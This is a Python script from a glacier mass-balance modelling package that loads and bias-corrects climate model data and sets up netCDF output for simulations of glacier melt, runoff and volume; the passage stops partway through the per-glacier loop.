# (Spyder) %run run_simulation_list_multiprocess.py C:\...\gcm_rcpXX_filenames.txt -option_parallels=0
# - Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Spyder cannot run parallels, so always set -option_parallels=0 when testing in Spyder.
# Built-in libraries
import argparse
import collections
import inspect
import multiprocessing
import os
import time
# External libraries
import pandas as pd
import pickle
import numpy as np
import xarray as xr
# Local libraries
import class_climate
import class_mbdata
import pygem_input as input
import pygemfxns_gcmbiasadj as gcmbiasadj
import pygemfxns_massbalance as massbalance
import pygemfxns_modelsetup as modelsetup
import spc_split_glaciers as split_glaciers
#%% FUNCTIONS
def getparser():
"""
Use argparse to add arguments from the command line
Parameters
----------
gcm_list_fn (optional) : str
text file that contains the climate data to be used in the model simulation
gcm_name (optional) : str
gcm name
rcp (optional) : str
representative concentration pathway (ex. 'rcp26')
num_simultaneous_processes (optional) : int
number of cores to use in parallels
option_parallels (optional) : int
switch to use parallels or not
rgi_glac_number_fn (optional) : str
filename of .pkl file containing a list of glacier numbers that used to run batches on the supercomputer
batch_number (optional): int
batch number used to differentiate output on supercomputer
option_ordered : int
option to keep glaciers ordered or to grab every n value for the batch
(the latter helps make sure run times on each core are similar as it removes any timing differences caused by
regional variations)
debug (optional) : int
Switch for turning debug printing on or off (default = 0 (off))
debug_spc (optional) : int
Switch for turning debug printing of spc on or off (default = 0 (off))
Returns
-------
Object containing arguments and their respective values.
"""
parser = argparse.ArgumentParser(description="run simulations from gcm list in parallel")
# add arguments
parser.add_argument('-gcm_list_fn', action='store', type=str, default=input.ref_gcm_name,
help='text file full of commands to run')
parser.add_argument('-gcm_name', action='store', type=str, default=None,
help='GCM name used for model run')
parser.add_argument('-rcp', action='store', type=str, default=None,
help='rcp scenario used for model run (ex. rcp26)')
parser.add_argument('-num_simultaneous_processes', action='store', type=int, default=4,
help='number of simultaneous processes (cores) to use')
parser.add_argument('-option_parallels', action='store', type=int, default=1,
help='Switch to use or not use parallels (1 - use parallels, 0 - do not)')
parser.add_argument('-rgi_glac_number_fn', action='store', type=str, default=None,
help='Filename containing list of rgi_glac_number, helpful for running batches on spc')
parser.add_argument('-batch_number', action='store', type=int, default=None,
help='Batch number used to differentiate output on supercomputer')
parser.add_argument('-option_ordered', action='store', type=int, default=1,
help='switch to keep lists ordered or not')
parser.add_argument('-debug', action='store', type=int, default=0,
help='Boolean for debugging to turn it on or off (default 0 is off')
parser.add_argument('-debug_spc', action='store', type=int, default=0,
help='Boolean for debugging to turn it on or off (default 0 is off')
return parser
def calc_stats_array(data, stats_cns=input.sim_stat_cns):
"""
Calculate stats for a given variable
Parameters
----------
vn : str
variable name
ds : xarray dataset
dataset of output with all ensemble simulations
Returns
-------
stats : np.array
Statistics related to a given variable
"""
if 'mean' in stats_cns:
stats = data.mean(axis=1)[:,np.newaxis]
if 'std' in stats_cns:
stats = np.append(stats, data.std(axis=1)[:,np.newaxis], axis=1)
if '2.5%' in stats_cns:
stats = np.append(stats, np.percentile(data, 2.5, axis=1)[:,np.newaxis], axis=1)
if '25%' in stats_cns:
stats = np.append(stats, np.percentile(data, 25, axis=1)[:,np.newaxis], axis=1)
if 'median' in stats_cns:
stats = np.append(stats, np.median(data, axis=1)[:,np.newaxis], axis=1)
if '75%' in stats_cns:
stats = np.append(stats, np.percentile(data, 75, axis=1)[:,np.newaxis], axis=1)
if '97.5%' in stats_cns:
stats = np.append(stats, np.percentile(data, 97.5, axis=1)[:,np.newaxis], axis=1)
return stats
def create_xrdataset(main_glac_rgi, dates_table, sim_iters=input.sim_iters, stat_cns=input.sim_stat_cns,
record_stats=0, option_wateryear=input.gcm_wateryear):
"""
Create empty xarray dataset that will be used to record simulation runs.
Parameters
----------
main_glac_rgi : pandas dataframe
dataframe containing relevant rgi glacier information
dates_table : pandas dataframe
table of the dates, months, days in month, etc.
sim_iters : int
number of simulation runs included
stat_cns : list
list of strings containing statistics that will be used on simulations
record_stats : int
Switch to change from recording simulations to statistics
Returns
-------
output_ds_all : xarray Dataset
empty xarray dataset that contains variables and attributes to be filled in by simulation runs
encoding : dictionary
encoding used with exporting xarray dataset to netcdf
"""
if input.output_package == 2:
# Create empty datasets for each variable and merge them
# Coordinate values
output_variables = input.output_variables_package2
glac_values = main_glac_rgi.index.values
annual_columns = np.unique(dates_table['wateryear'].values)[0:int(dates_table.shape[0]/12)]
time_values = dates_table.loc[input.spinupyears*12:dates_table.shape[0]+1,'date'].tolist()
year_values = annual_columns[input.spinupyears:annual_columns.shape[0]]
year_plus1_values = np.concatenate((annual_columns[input.spinupyears:annual_columns.shape[0]],
np.array([annual_columns[annual_columns.shape[0]-1]+1])))
# Year type for attributes
if option_wateryear == 1:
year_type = 'water year'
elif option_wateryear == 2:
year_type = 'calendar year'
else:
year_type = 'custom year'
# Switch to record simulations or statistics
if record_stats == 0:
record_name = 'sim'
record_name_values = np.arange(0,sim_iters)
elif record_stats == 1:
record_name = 'stats'
record_name_values = input.sim_stat_cns
# Variable coordinates dictionary
output_coords_dict = {
'prec_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'temp_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'acc_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'refreeze_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'melt_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'frontalablation_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'massbaltotal_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'runoff_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'snowline_glac_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'area_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
'volume_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year_plus1', year_plus1_values), (record_name, record_name_values)]),
'ELA_glac_annual': collections.OrderedDict(
[('glac', glac_values), ('year', year_values), (record_name, record_name_values)]),
'offglac_prec_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_refreeze_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_melt_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_snowpack_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
'offglac_runoff_monthly': collections.OrderedDict(
[('glac', glac_values), ('time', time_values), (record_name, record_name_values)]),
}
# Attributes dictionary
output_attrs_dict = {
'time': {
'long_name': 'date',
'year_type':year_type},
'glac': {
'long_name': 'glacier index',
'comment': 'glacier index value that refers to the glacier table'},
'year': {
'long_name': 'years',
'year_type': year_type,
'comment': 'years referring to the start of each year'},
'year_plus1': {
'long_name': 'years plus one additional year',
'year_type': year_type,
'comment': ('additional year allows one to record glacier dimension changes at end of '
'model run')},
'sim': {
'long_name': 'simulation number',
'comment': 'simulation numbers only needed for MCMC methods'},
'stats': {
'long_name': 'variable statistics',
'comment': '% refers to percentiles'},
'temp_glac_monthly': {
'long_name': 'glacier-wide mean air temperature',
'units': 'degC',
'temporal_resolution': 'monthly',
'comment': (
'each elevation bin is weighted equally to compute the mean temperature, and '
'bins where the glacier no longer exists due to retreat have been removed')},
'prec_glac_monthly': {
'long_name': 'glacier-wide precipitation (liquid)',
'units': 'm',
'temporal_resolution': 'monthly',
'comment': 'only the liquid precipitation, solid precipitation excluded'},
'acc_glac_monthly': {
'long_name': 'glacier-wide accumulation',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'only the solid precipitation'},
'refreeze_glac_monthly': {
'long_name': 'glacier-wide refreeze',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'melt_glac_monthly': {
'long_name': 'glacier-wide melt',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'frontalablation_glac_monthly': {
'long_name': 'glacier-wide frontal ablation',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': (
'mass losses from calving, subaerial frontal melting, sublimation above the '
'waterline and subaqueous frontal melting below the waterline')},
'massbaltotal_glac_monthly': {
'long_name': 'glacier-wide total mass balance',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': (
'total mass balance is the sum of the climatic mass balance and frontal '
'ablation')},
'runoff_glac_monthly': {
'long_name': 'glacier-wide runoff',
'units': 'm**3',
'temporal_resolution': 'monthly',
'comment': 'runoff from the glacier terminus, which moves over time'},
'snowline_glac_monthly': {
'long_name': 'transient snowline',
'units': 'm a.s.l.',
'temporal_resolution': 'monthly',
'comment': 'transient snowline is altitude separating snow from ice/firn'},
'area_glac_annual': {
'long_name': 'glacier area',
'units': 'km**2',
'temporal_resolution': 'annual',
'comment': 'area used for the duration of the defined start/end of year'},
'volume_glac_annual': {
'long_name': 'glacier volume',
'units': 'km**3 ice',
'temporal_resolution': 'annual',
'comment': 'volume based on area and ice thickness used for that year'},
'ELA_glac_annual': {
'long_name': 'annual equilibrium line altitude',
'units': 'm a.s.l.',
'temporal_resolution': 'annual',
'comment': (
'equilibrium line altitude is the elevation where the climatic mass balance is '
'zero')},
'offglac_prec_monthly': {
'long_name': 'off-glacier-wide precipitation (liquid)',
'units': 'm',
'temporal_resolution': 'monthly',
'comment': 'only the liquid precipitation, solid precipitation excluded'},
'offglac_refreeze_monthly': {
'long_name': 'off-glacier-wide refreeze',
'units': 'm w.e.',
'temporal_resolution': 'monthly'},
'offglac_melt_monthly': {
'long_name': 'off-glacier-wide melt',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'only melt of snow and refreeze since off-glacier'},
'offglac_runoff_monthly': {
'long_name': 'off-glacier-wide runoff',
'units': 'm**3',
'temporal_resolution': 'monthly',
'comment': 'off-glacier runoff from area where glacier no longer exists'},
'offglac_snowpack_monthly': {
'long_name': 'off-glacier-wide snowpack',
'units': 'm w.e.',
'temporal_resolution': 'monthly',
'comment': 'snow remaining accounting for new accumulation, melt, and refreeze'},
}
# Add variables to empty dataset and merge together
count_vn = 0
encoding = {}
noencoding_vn = ['stats', 'glac_attrs']
for vn in output_variables:
count_vn += 1
empty_holder = np.zeros([len(output_coords_dict[vn][i]) for i in list(output_coords_dict[vn].keys())])
output_ds = xr.Dataset({vn: (list(output_coords_dict[vn].keys()), empty_holder)},
coords=output_coords_dict[vn])
# Merge datasets of stats into one output
if count_vn == 1:
output_ds_all = output_ds
else:
output_ds_all = xr.merge((output_ds_all, output_ds))
# Add a glacier table so that the glaciers attributes accompany the netcdf file
main_glac_rgi_float = main_glac_rgi[input.output_glacier_attr_vns].copy()
main_glac_rgi_xr = xr.Dataset({'glacier_table': (('glac', 'glac_attrs'), main_glac_rgi_float.values)},
coords={'glac': glac_values,
'glac_attrs': main_glac_rgi_float.columns.values})
output_ds_all = output_ds_all.combine_first(main_glac_rgi_xr)
output_ds_all.glacier_table.attrs['long_name'] = 'RGI glacier table'
output_ds_all.glacier_table.attrs['comment'] = 'table contains attributes from RGI for each glacier'
output_ds_all.glac_attrs.attrs['long_name'] = 'RGI glacier attributes'
# Add attributes
for vn in output_ds_all.variables:
try:
output_ds_all[vn].attrs = output_attrs_dict[vn]
except:
pass
# Encoding (specify _FillValue, offsets, etc.)
if vn not in noencoding_vn:
encoding[vn] = {'_FillValue': False}
return output_ds_all, encoding
def convert_glacwide_results(elev_bins, glac_bin_temp, glac_bin_prec, glac_bin_acc, glac_bin_refreeze,
glac_bin_snowpack, glac_bin_melt, glac_bin_frontalablation, glac_bin_massbalclim_annual,
glac_bin_area_annual, glac_bin_icethickness_annual):
"""
Convert raw runmassbalance function output to glacier-wide results for output package 2
Parameters
----------
elev_bins : numpy array
elevation of each elevation bin
glac_bin_temp : numpy array
temperature for each elevation bin for each timestep
glac_bin_prec : numpy array
precipitation (liquid) for each elevation bin for each timestep
glac_bin_acc : numpy array
accumulation (solid precipitation) for each elevation bin for each timestep
glac_bin_refreeze : numpy array
refreeze for each elevation bin for each timestep
glac_bin_snowpack : numpy array
snowpack for each elevation bin for each timestep
glac_bin_melt : numpy array
glacier melt for each elevation bin for each timestep
glac_bin_frontalablation : numpy array
frontal ablation for each elevation bin for each timestep
glac_bin_massbalclim_annual : numpy array
annual climatic mass balance for each elevation bin for each timestep
glac_bin_area_annual : numpy array
annual glacier area for each elevation bin for each timestep
glac_bin_icethickness_annual: numpy array
annual ice thickness for each elevation bin for each timestep
Returns
-------
glac_wide_temp : np.array
monthly mean glacier-wide temperature (bins weighted equally)
glac_wide_prec : np.array
monthly glacier-wide precipitation (liquid only)
glac_wide_acc : np.array
monthly glacier-wide accumulation (solid precipitation only)
glac_wide_refreeze : np.array
monthly glacier-wide refreeze
glac_wide_melt : np.array
monthly glacier-wide melt
glac_wide_frontalablation : np.array
monthly glacier-wide frontal ablation
glac_wide_massbaltotal : np.array
monthly glacier-wide total mass balance (climatic mass balance + frontal ablation)
glac_wide_runoff: np.array
monthly glacier-wide runoff at the terminus of the glacier
glac_wide_snowline : np.array
monthly glacier-wide snowline
glac_wide_area_annual : np.array
annual glacier area
glac_wide_volume_annual : np.array
annual glacier volume
glac_wide_ELA_annual : np.array
annual equilibrium line altitude
"""
# Preset desired output (needed to avoid dividing by zero)
glac_wide_temp = np.zeros(glac_bin_temp.shape[1])
glac_wide_prec = np.zeros(glac_bin_temp.shape[1])
glac_wide_acc = np.zeros(glac_bin_temp.shape[1])
glac_wide_refreeze = np.zeros(glac_bin_temp.shape[1])
glac_wide_melt = np.zeros(glac_bin_temp.shape[1])
glac_wide_frontalablation = np.zeros(glac_bin_temp.shape[1])
# Compute desired output
glac_bin_area = glac_bin_area_annual[:,0:glac_bin_area_annual.shape[1]-1].repeat(12,axis=1)
glac_wide_area = glac_bin_area.sum(axis=0)
glac_wide_temp_sum = glac_bin_temp.sum(axis=0)
glac_bin_temp_nonzero = np.zeros(glac_bin_temp.shape)
glac_bin_temp_nonzero[glac_bin_temp != 0] = 1
glac_wide_temp_bincount = glac_bin_temp_nonzero.sum(axis=0)
glac_wide_temp[glac_wide_temp_bincount > 0] = (glac_wide_temp_sum[glac_wide_temp_bincount > 0] /
glac_wide_temp_bincount[glac_wide_temp_bincount > 0])
glac_wide_prec_mkm2 = (glac_bin_prec * glac_bin_area).sum(axis=0)
glac_wide_prec[glac_wide_prec_mkm2 > 0] = (glac_wide_prec_mkm2[glac_wide_prec_mkm2 > 0] /
glac_wide_area[glac_wide_prec_mkm2 > 0])
glac_wide_acc_mkm2 = (glac_bin_acc * glac_bin_area).sum(axis=0)
glac_wide_acc[glac_wide_acc_mkm2 > 0] = (glac_wide_acc_mkm2[glac_wide_acc_mkm2 > 0] /
glac_wide_area[glac_wide_acc_mkm2 > 0])
glac_wide_refreeze_mkm2 = (glac_bin_refreeze * glac_bin_area).sum(axis=0)
glac_wide_refreeze[glac_wide_refreeze_mkm2 > 0] = (glac_wide_refreeze_mkm2[glac_wide_refreeze_mkm2 > 0] /
glac_wide_area[glac_wide_refreeze_mkm2 > 0])
glac_wide_melt_mkm2 = (glac_bin_melt * glac_bin_area).sum(axis=0)
glac_wide_melt[glac_wide_melt_mkm2 > 0] = (glac_wide_melt_mkm2[glac_wide_melt_mkm2 > 0] /
glac_wide_area[glac_wide_melt_mkm2 > 0])
glac_wide_frontalablation_mkm2 = (glac_bin_frontalablation * glac_bin_area).sum(axis=0)
glac_wide_frontalablation[glac_wide_frontalablation_mkm2 > 0] = (
glac_wide_frontalablation_mkm2[glac_wide_frontalablation_mkm2 > 0] /
glac_wide_area[glac_wide_frontalablation_mkm2 > 0])
glac_wide_massbalclim = glac_wide_acc + glac_wide_refreeze - glac_wide_melt
glac_wide_massbaltotal = glac_wide_massbalclim - glac_wide_frontalablation
glac_wide_runoff = (glac_wide_prec + glac_wide_melt - glac_wide_refreeze) * glac_wide_area * (1000)**2
# units: (m + m w.e. - m w.e.) * km**2 * (1000 m / 1 km)**2 = m**3
glac_wide_snowline = (glac_bin_snowpack > 0).argmax(axis=0)
glac_wide_snowline[glac_wide_snowline > 0] = (elev_bins[glac_wide_snowline[glac_wide_snowline > 0]] -
input.binsize/2)
glac_wide_area_annual = glac_bin_area_annual.sum(axis=0)
glac_wide_volume_annual = (glac_bin_area_annual * glac_bin_icethickness_annual / 1000).sum(axis=0)
glac_wide_ELA_annual = (glac_bin_massbalclim_annual > 0).argmax(axis=0)
glac_wide_ELA_annual[glac_wide_ELA_annual > 0] = (elev_bins[glac_wide_ELA_annual[glac_wide_ELA_annual > 0]] -
input.binsize/2)
# ELA and snowline can't be below minimum elevation
glac_zmin_annual = elev_bins[(glac_bin_area_annual > 0).argmax(axis=0)][:-1] - input.binsize/2
glac_wide_ELA_annual[glac_wide_ELA_annual < glac_zmin_annual] = (
glac_zmin_annual[glac_wide_ELA_annual < glac_zmin_annual])
glac_zmin = elev_bins[(glac_bin_area > 0).argmax(axis=0)] - input.binsize/2
glac_wide_snowline[glac_wide_snowline < glac_zmin] = glac_zmin[glac_wide_snowline < glac_zmin]
# print('DELETE ME - TESTING')
# # Compute glacier volume change for every time step and use this to compute mass balance
# # this will work for any indexing
# glac_wide_area = glac_wide_area_annual[:-1].repeat(12)
#
## print('glac_wide_area_annual:', glac_wide_area_annual)
#
# # Mass change [km3 mwe]
# # mb [mwea] * (1 km / 1000 m) * area [km2]
# glac_wide_masschange = glac_wide_massbaltotal / 1000 * glac_wide_area
#
# print('glac_wide_melt:', glac_wide_melt)
## print('glac_wide_massbaltotal:', glac_wide_massbaltotal)
## print('glac_wide_masschange:', glac_wide_masschange)
## print('glac_wide_masschange.shape[0] / 12:', glac_wide_masschange.shape[0] / 12)
#
# # Mean annual mass balance [mwea]
# mb_mwea = (glac_wide_masschange.sum() / glac_wide_area[0] * 1000 /
# (glac_wide_masschange.shape[0] / 12))
# print(' mb_model [mwea]:', mb_mwea.round(3))
return (glac_wide_temp, glac_wide_prec, glac_wide_acc, glac_wide_refreeze, glac_wide_melt,
glac_wide_frontalablation, glac_wide_massbaltotal, glac_wide_runoff, glac_wide_snowline,
glac_wide_area_annual, glac_wide_volume_annual, glac_wide_ELA_annual)
def main(list_packed_vars):
"""
Model simulation
Parameters
----------
list_packed_vars : list
list of packed variables that enable the use of parallels
Returns
-------
netcdf files of the simulation output (specific output is dependent on the output option)
"""
# Unpack variables
count = list_packed_vars[0]
glac_no = list_packed_vars[1]
regions_str = list_packed_vars[2]
gcm_name = list_packed_vars[3]
parser = getparser()
args = parser.parse_args()
if (gcm_name != input.ref_gcm_name) and (args.rcp is None):
rcp_scenario = os.path.basename(args.gcm_list_fn).split('_')[1]
elif args.rcp is not None:
rcp_scenario = args.rcp
if debug:
if 'rcp_scenario' in locals():
print(rcp_scenario)
if args.debug_spc == 1:
debug_spc = True
else:
debug_spc = False
# ===== LOAD GLACIERS =====
main_glac_rgi = modelsetup.selectglaciersrgitable(glac_no=glac_no)
# Load glacier data for Huss and Farinotti to avoid repetitively reading the csv file (not needed for OGGM)
if input.hyps_data in ['Huss', 'Farinotti']:
# Glacier hypsometry [km**2], total area
main_glac_hyps = modelsetup.import_Husstable(main_glac_rgi, input.hyps_filepath, input.hyps_filedict,
input.hyps_colsdrop)
# Ice thickness [m], average
main_glac_icethickness = modelsetup.import_Husstable(main_glac_rgi, input.thickness_filepath,
input.thickness_filedict, input.thickness_colsdrop)
main_glac_icethickness[main_glac_icethickness < 0] = 0
main_glac_hyps[main_glac_icethickness == 0] = 0
# Width [km], average
main_glac_width = modelsetup.import_Husstable(main_glac_rgi, input.width_filepath, input.width_filedict,
input.width_colsdrop)
# if input.option_surfacetype_debris == 1:
# main_glac_debrisfactor = modelsetup.import_Husstable(main_glac_rgi, input.debris_fp, input.debris_filedict,
# input.debris_colsdrop)
# else:
# print('\n\nDELETE ME - CHECK THAT THIS IS SAME FORMAT AS MAIN_GLAC_HYPS AND OTHERS\n\n')
# main_glac_debrisfactor = np.zeros(main_glac_hyps.shape) + 1
# main_glac_debrisfactor[main_glac_hyps == 0] = 0
# ===== TIME PERIOD =====
dates_table = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
spinupyears=input.gcm_spinupyears, option_wateryear=input.gcm_wateryear)
# # =================
# if debug:
# # Select dates including future projections
# # - nospinup dates_table needed to get the proper time indices
# dates_table_nospinup = modelsetup.datesmodelrun(startyear=input.gcm_startyear, endyear=input.gcm_endyear,
# spinupyears=0, option_wateryear=input.gcm_wateryear)
#
# # ===== LOAD CALIBRATION DATA =====
# cal_data = pd.DataFrame()
# for dataset in input.cal_datasets:
# cal_subset = class_mbdata.MBData(name=dataset)
# cal_subset_data = cal_subset.retrieve_mb(main_glac_rgi, main_glac_hyps, dates_table_nospinup)
# cal_data = cal_data.append(cal_subset_data, ignore_index=True)
# cal_data = cal_data.sort_values(['glacno', 't1_idx'])
# cal_data.reset_index(drop=True, inplace=True)
# # =================
# ===== LOAD CLIMATE DATA =====
# Set up climate class
if gcm_name in ['ERA5', 'ERA-Interim', 'COAWST']:
gcm = class_climate.GCM(name=gcm_name)
# Check that end year is reasonable
if (input.gcm_endyear > int(time.strftime("%Y"))) and (input.option_synthetic_sim == 0):
print('\n\nEND YEAR BEYOND AVAILABLE DATA FOR ERA-INTERIM. CHANGE END YEAR.\n\n')
else:
# GCM object
gcm = class_climate.GCM(name=gcm_name, rcp_scenario=rcp_scenario)
# Reference GCM
ref_gcm = class_climate.GCM(name=input.ref_gcm_name)
# Adjust reference dates in event that reference is longer than GCM data
if input.ref_startyear >= input.gcm_startyear:
ref_startyear = input.ref_startyear
else:
ref_startyear = input.gcm_startyear
if input.ref_endyear <= input.gcm_endyear:
ref_endyear = input.ref_endyear
else:
ref_endyear = input.gcm_endyear
dates_table_ref = modelsetup.datesmodelrun(startyear=ref_startyear, endyear=ref_endyear,
spinupyears=input.spinupyears,
option_wateryear=input.ref_wateryear)
# Load climate data
if input.option_synthetic_sim == 0:
# Air temperature [degC]
gcm_temp, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table)
if input.option_ablation != 2:
gcm_tempstd = np.zeros(gcm_temp.shape)
elif input.option_ablation == 2 and gcm_name in ['ERA5']:
gcm_tempstd, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.tempstd_fn, gcm.tempstd_vn,
main_glac_rgi, dates_table)
elif input.option_ablation == 2 and input.ref_gcm_name in ['ERA5']:
# Compute temp std based on reference climate data
ref_tempstd, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.tempstd_fn, ref_gcm.tempstd_vn,
main_glac_rgi, dates_table_ref)
# Monthly average from reference climate data
gcm_tempstd = gcmbiasadj.monthly_avg_array_rolled(ref_tempstd, dates_table_ref, dates_table)
else:
gcm_tempstd = np.zeros(gcm_temp.shape)
# Precipitation [m]
gcm_prec, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
if gcm_name in ['ERA-Interim', 'ERA5']:
gcm_lr, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi, dates_table)
else:
# Compute lapse rates based on reference climate data
ref_lr, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.lr_fn, ref_gcm.lr_vn, main_glac_rgi,
dates_table_ref)
# Monthly average from reference climate data
gcm_lr = gcmbiasadj.monthly_avg_array_rolled(ref_lr, dates_table_ref, dates_table)
# COAWST data has two domains, so need to merge the two domains
if gcm_name == 'COAWST':
gcm_temp_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn_d01, gcm.temp_vn,
main_glac_rgi, dates_table)
gcm_prec_d01, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn_d01, gcm.prec_vn,
main_glac_rgi, dates_table)
gcm_elev_d01 = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn_d01, gcm.elev_vn, main_glac_rgi)
# Check if glacier outside of high-res (d02) domain
for glac in range(main_glac_rgi.shape[0]):
glac_lat = main_glac_rgi.loc[glac,input.rgi_lat_colname]
glac_lon = main_glac_rgi.loc[glac,input.rgi_lon_colname]
if (~(input.coawst_d02_lat_min <= glac_lat <= input.coawst_d02_lat_max) or
~(input.coawst_d02_lon_min <= glac_lon <= input.coawst_d02_lon_max)):
gcm_prec[glac,:] = gcm_prec_d01[glac,:]
gcm_temp[glac,:] = gcm_temp_d01[glac,:]
gcm_elev[glac] = gcm_elev_d01[glac]
# ===== Synthetic Simulation =====
elif input.option_synthetic_sim == 1:
# Synthetic dates table
dates_table_synthetic = modelsetup.datesmodelrun(
startyear=input.synthetic_startyear, endyear=input.synthetic_endyear,
option_wateryear=input.gcm_wateryear, spinupyears=0)
# Air temperature [degC]
gcm_temp_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.temp_fn, gcm.temp_vn, main_glac_rgi,
dates_table_synthetic)
# Precipitation [m]
gcm_prec_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.prec_fn, gcm.prec_vn, main_glac_rgi,
dates_table_synthetic)
# Elevation [m asl]
gcm_elev = gcm.importGCMfxnearestneighbor_xarray(gcm.elev_fn, gcm.elev_vn, main_glac_rgi)
# Lapse rate
gcm_lr_tile, gcm_dates = gcm.importGCMvarnearestneighbor_xarray(gcm.lr_fn, gcm.lr_vn, main_glac_rgi,
dates_table_synthetic)
# Future simulation based on synthetic (replicated) data; add spinup years; dataset restarts after spinupyears
datelength = dates_table.shape[0] - input.gcm_spinupyears * 12
n_tiles = int(np.ceil(datelength / dates_table_synthetic.shape[0]))
gcm_temp = np.append(gcm_temp_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_temp_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_prec = np.append(gcm_prec_tile[:,:input.gcm_spinupyears*12],
np.tile(gcm_prec_tile,(1,n_tiles))[:,:datelength], axis=1)
gcm_lr = np.append(gcm_lr_tile[:,:input.gcm_spinupyears*12], np.tile(gcm_lr_tile,(1,n_tiles))[:,:datelength],
axis=1)
# Temperature and precipitation sensitivity adjustments
gcm_temp = gcm_temp + input.synthetic_temp_adjust
gcm_prec = gcm_prec * input.synthetic_prec_factor
# ===== BIAS CORRECTIONS =====
# No adjustments
if input.option_bias_adjustment == 0 or gcm_name == input.ref_gcm_name:
gcm_temp_adj = gcm_temp
gcm_prec_adj = gcm_prec
gcm_elev_adj = gcm_elev
# Bias correct based on reference climate data
else:
# Air temperature [degC], Precipitation [m], Elevation [masl], Lapse rate [K m-1]
ref_temp, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.temp_fn, ref_gcm.temp_vn,
main_glac_rgi, dates_table_ref)
ref_prec, ref_dates = ref_gcm.importGCMvarnearestneighbor_xarray(ref_gcm.prec_fn, ref_gcm.prec_vn,
main_glac_rgi, dates_table_ref)
ref_elev = ref_gcm.importGCMfxnearestneighbor_xarray(ref_gcm.elev_fn, ref_gcm.elev_vn, main_glac_rgi)
# OPTION 1: Adjust temp using Huss and Hock (2015), prec similar but addresses for variance and outliers
if input.option_bias_adjustment == 1:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_opt1(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# OPTION 2: Adjust temp and prec using Huss and Hock (2015)
elif input.option_bias_adjustment == 2:
# Temperature bias correction
gcm_temp_adj, gcm_elev_adj = gcmbiasadj.temp_biasadj_HH2015(ref_temp, ref_elev, gcm_temp,
dates_table_ref, dates_table)
# Precipitation bias correction
gcm_prec_adj, gcm_elev_adj = gcmbiasadj.prec_biasadj_HH2015(ref_prec, ref_elev, gcm_prec,
dates_table_ref, dates_table)
# Checks on precipitation data
assert gcm_prec_adj.max() <= 10, 'gcm_prec_adj (precipitation bias adjustment) too high, needs to be modified'
assert gcm_prec_adj.min() >= 0, 'gcm_prec_adj is producing a negative precipitation value'
# ===== RUN MASS BALANCE =====
# Number of simulations
if input.option_calibration == 2:
sim_iters = input.sim_iters
else:
sim_iters = 1
# # Create datasets to store simulations
# output_ds_all, encoding = create_xrdataset(main_glac_rgi, dates_table, sim_iters=sim_iters,
# option_wateryear=input.gcm_wateryear)
# output_ds_all_stats, encoding = create_xrdataset(main_glac_rgi, dates_table, record_stats=1,
# option_wateryear=input.gcm_wateryear)
for glac in range(main_glac_rgi.shape[0]):
if glac == 0 or glac == main_glac_rgi.shape[0]:
print(gcm_name,':', main_glac_rgi.loc[main_glac_rgi.index.values[glac],'RGIId'])
# Select subsets of data
glacier_rgi_table = main_glac_rgi.loc[main_glac_rgi.index.values[glac], :]
glacier_str = '{0:0.5f}'.format(glacier_rgi_table['RGIId_float'])
glacier_gcm_elev = gcm_elev_adj[glac]
glacier_gcm_prec = gcm_prec_adj[glac,:]
glacier_gcm_temp = gcm_temp_adj[glac,:]
